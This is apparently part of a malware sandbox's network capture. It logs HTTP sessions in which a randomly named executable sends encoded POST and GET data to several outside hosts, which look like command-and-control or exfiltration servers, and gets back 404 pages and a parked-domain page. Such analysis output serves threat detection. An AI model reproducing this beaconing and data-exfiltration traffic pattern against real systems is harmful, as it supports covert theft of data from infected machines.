43 56 2b 6b 61 2f 6d 73 37 50 41 61 48 42 38 46 66 68 54 63 6a 33 74 38 36 4e 6e 6b 54 6c 34 47 64 6f 57 68 6c 50 62 63 57 62 64 41 6f 57 65 30 52 47 56 45 38 53 4d 67 4f 55 74 46 4d 57 66 37 6c 73 53 78 49 78 41 69 4e 77 71 43 45 7a 38 35 2f 37 7a 71 57 34 66 70 77 3d Data Ascii: kbRxoVY0=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgOUtFMWf7lsSxIxAiNwqCEz85/7zqW4fpw=
Aug 29, 2024 05:24:40.612752914 CEST	367	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 03:32:49 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	43.252.167.188	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:24:42.292506933 CEST	10898	OUT	POST /rm91/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--fhq1c541j0zr.com Origin: http://www.xn--fhq1c541j0zr.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10305 Referer: http://www.xn--fhq1c541j0zr.com/rm91/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 48 6f 57 33 77 75 37 41 65 42 54 39 68 52 48 78 42 62 57 5a 2b 78 75 70 63 66 36 2f 53 47 6e 47 63 70 6d 6a 69 36 6b 59 6a 37 6b 45 4d 49 61 35 48 48 76 73 68 51 35 2b 2f 50 54 75 74 34 51 4b 30 71 5a 35 39 37 2f 58 62 4f 69 31 63 57 52 4b 46 67 57 53 41 44 41 2b 6b 44 49 6d 73 76 6c 56 36 6e 42 6c 6c 50 68 65 4f 37 33 79 4d 36 50 6d 55 54 44 34 47 59 32 57 69 42 6c 62 66 4b 78 64 43 30 57 66 78 51 41 41 6e 73 61 54 6d 65 51 32 6b 6f 4d 45 63 4a 38 62 43 38 2f 44 67 56 73 38 43 77 58 78 4c 69 46 32 61 36 37 62 74 66 66 39 34 41 56 65 53 50 64 45 43 76 35 70 6c 41 61 42 70 6a 49 2f 76 72 59 67 2f 49 35 4f 33 31 63 52 45 39 66 36 59 6b 35 62 4d 7a 51 72 2b 49 4a 37 58 54 4e 31 6d 4a 50 32 33 70 61 4e 65 70 68 2f 53 74 41 66 59 43 54 35 48 59 6d 32 35 59 6f 47 76 78 70 76 30 74 4e 64 74 51 43 72 43 55 39 62 61 31 55 6c 79 56 72 36 34 47 62 49 39 58 48 4c [TRUNCATED] Data Ascii: kbRxoVY0=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIHoW3wu7AeBT9hRHxBbWZ+xupcf6/SGnGcpmji6kYj7kEMIa5HHvshQ5+/PTut4QK0qZ597/XbOi1cWRKFgWSADA+kDImsvlV6nBllPheO73yM6PmUTD4GY2WiBlbfKxdC0WfxQAAnsaTmeQ2koMEcJ8bC8/DgVs8CwXxLiF2a67btff94AVeSPdECv5plAaBpjI/vrYg/I5O31cRE9f6Yk5bMzQr+IJ7XTN1mJP23paNeph/StAfYCT5HYm25YoGvxpv0tNdtQCrCU9ba1UlyVr64GbI9XHLizt0pVuotL56dcfbRt22sqIkMd51A2wm8EW0SiiNi/QpdtY8XMVE1bwp7GBEL34NQvDeP+UeWn40D/J+yz9oKTMOHMojIE7gwrHQZC3z5phGWjMLqThzYqL4v4hWgBu6MjSrEJ93kGXnxZZ/8fLsyOzpylVY3PZIUFSaXUVMcV9EWisug167GRuBhd63iiG6kUHBGOf8/JSyacK9Whc1aNpDrXFakxg9DsUvjaG2s/DEfgYJLfZTPCoQd5ijEaof0171coCztoVSuQ1msEF+FnhNF7wDIN3+iGk+A3L+18f43ePXdQX+NdciT1g4CDSd14ipxbT1jV1Sm1QFpIXhz1QNtPUQkzRhQDEY2x6RwibrEMn2OQ+LkRrmGCLz5C+DuDpNaonW0MM8DSq1BwhJjeIfs6YbP+366NXxUcl85SJr0sEeKbSwvjzMO+QYy3o9Y4InICSg72javScEAe9yBUfT0HIT32wHcrM6TbOWuMYuib1J61Lxthy37BW2Wa0DJF4j/X1pEK/6Fy09gY7InTaFUn7AeXXXnrzWAt6HNOoYwjEBJ705hAXx1zxI0jQQaLhLFYmeTQQWj1Fc53eNhCnHqD7KGNNWPGNfeHFDCTvaUzaYzbiHbmiWxXImU1bkqsAKvsrHHQjUVqP41wEFaeyhVVotORkpSz [TRUNCATED]
Aug 29, 2024 05:24:43.162997007 CEST	367	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 03:32:51 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	43.252.167.188	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:24:44.825088024 CEST	510	OUT	GET /rm91/?DnUL=_290s&kbRxoVY0=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.xn--fhq1c541j0zr.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 29, 2024 05:24:45.696408033 CEST	367	IN	HTTP/1.1 404 Not Found Date: Thu, 29 Aug 2024 03:32:54 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	194.9.94.85	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:24:50.821105957 CEST	796	OUT	POST /4hda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 205 Referer: http://www.xn--matfrmn-jxa4m.se/4hda/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 2f 48 67 49 57 6e 6b 32 43 46 4a 44 59 5a 35 53 2f 5a 30 73 55 33 36 56 4d 78 2b 44 6f 58 76 74 6f 4b 53 57 66 47 4d 6a 79 6b 4d 46 70 30 42 75 67 46 72 74 58 59 6a 77 57 54 4f 56 51 4d 2b 6d 44 32 51 74 6d 4a 76 42 77 63 6e 57 38 42 4a 58 73 7a 71 4b 35 33 51 76 42 74 6d 62 32 64 6d 72 6b 44 69 43 33 2b 66 56 52 76 66 4a 70 41 6a 33 54 7a 55 43 57 5a 74 44 53 52 59 38 45 6f 66 4b 6b 67 77 43 4c 71 33 67 64 35 50 6d 59 43 36 79 41 6f 45 32 58 63 6e 30 59 73 41 46 43 66 32 35 4c 4b 39 55 74 59 5a 59 74 67 75 41 72 58 62 55 38 47 34 48 63 77 3d 3d Data Ascii: kbRxoVY0=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2Xcn0YsAFCf25LK9UtYZYtguArXbU8G4Hcw==
Aug 29, 2024 05:24:51.454845905 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 29 Aug 2024 03:24:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 29, 2024 05:24:51.454865932 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Aug 29, 2024 05:24:51.454879045 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Aug 29, 2024 05:24:51.454890013 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Aug 29, 2024 05:24:51.454912901 CEST	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	194.9.94.85	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:24:53.356384993 CEST	816	OUT	POST /4hda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 225 Referer: http://www.xn--matfrmn-jxa4m.se/4hda/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 37 74 76 75 57 57 65 48 4d 6a 78 6b 4d 46 37 55 41 6c 75 6c 72 36 58 59 2f 34 57 53 79 56 51 4d 36 6d 44 79 55 74 6d 2b 44 43 78 4d 6e 55 30 68 4a 52 6f 7a 71 4b 35 33 51 76 42 74 44 32 32 64 2b 72 6e 7a 53 43 32 63 33 4b 62 50 65 37 75 41 6a 33 45 6a 56 46 57 5a 73 7a 53 55 34 57 45 71 33 4b 6b 6b 30 43 4c 59 50 6a 4f 5a 4f 74 58 69 36 6e 50 49 45 35 51 50 4b 4a 52 72 6f 2f 4e 74 6d 6c 48 73 73 4f 38 70 34 50 2f 67 4b 7a 32 51 53 67 78 46 46 4f 48 30 77 34 4f 52 4a 79 4d 44 38 49 34 71 37 44 79 2f 52 71 70 6e 34 3d Data Ascii: kbRxoVY0=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gKz2QSgxFFOH0w4ORJyMD8I4q7Dy/Rqpn4=
Aug 29, 2024 05:24:54.012830019 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 29 Aug 2024 03:24:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 29, 2024 05:24:54.012865067 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Aug 29, 2024 05:24:54.012877941 CEST	448	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Aug 29, 2024 05:24:54.012890100 CEST	1236	IN	Data Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20 Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
Aug 29, 2024 05:24:54.012902021 CEST	1236	IN	Data Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
Aug 29, 2024 05:24:54.012912989 CEST	430	IN	Data Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	194.9.94.85	80	2840	C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 05:24:55.886243105 CEST	10898	OUT	POST /4hda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10305 Referer: http://www.xn--matfrmn-jxa4m.se/4hda/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6b 62 52 78 6f 56 59 30 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 6a 74 76 62 43 57 66 6b 30 6a 77 6b 4d 46 67 55 42 69 75 6c 71 34 58 59 33 38 57 53 2b 76 51 4f 53 6d 43 58 41 74 6b 4c 33 43 6f 38 6e 55 32 68 4a 51 73 7a 72 65 35 33 41 72 42 74 7a 32 32 64 2b 72 6e 78 4b 43 67 2b 66 4b 55 76 66 4a 70 41 6a 7a 54 7a 55 69 57 5a 31 4c 53 55 38 73 45 61 58 4b 6b 41 51 43 59 4c 33 6a 4e 35 4f 76 51 69 37 69 50 49 4a 35 51 4f 6e 6c 52 75 55 56 4e 76 36 6c 57 39 73 52 6a 4e 49 4f 73 67 47 4b 31 52 32 52 39 32 56 54 66 30 78 45 44 7a 68 53 64 32 63 46 79 72 65 6f 72 38 4e 62 37 79 50 6d 65 6d 33 2f 67 39 6b 52 5a 36 38 36 4f 59 64 4e 42 77 5a 6d 79 6a 35 78 33 51 2b 79 77 30 51 6e 6d 66 64 70 46 41 75 46 70 58 42 32 45 51 31 78 62 59 72 31 66 59 2b 45 6b 45 46 66 33 51 54 58 69 70 4b 35 69 6b 2f 52 74 4a 49 66 58 53 2b 76 64 53 32 52 6b 75 64 67 6f 30 6c 6e 6a 6b 6c 67 7a 43 32 6e 32 49 4b 30 5a 32 46 62 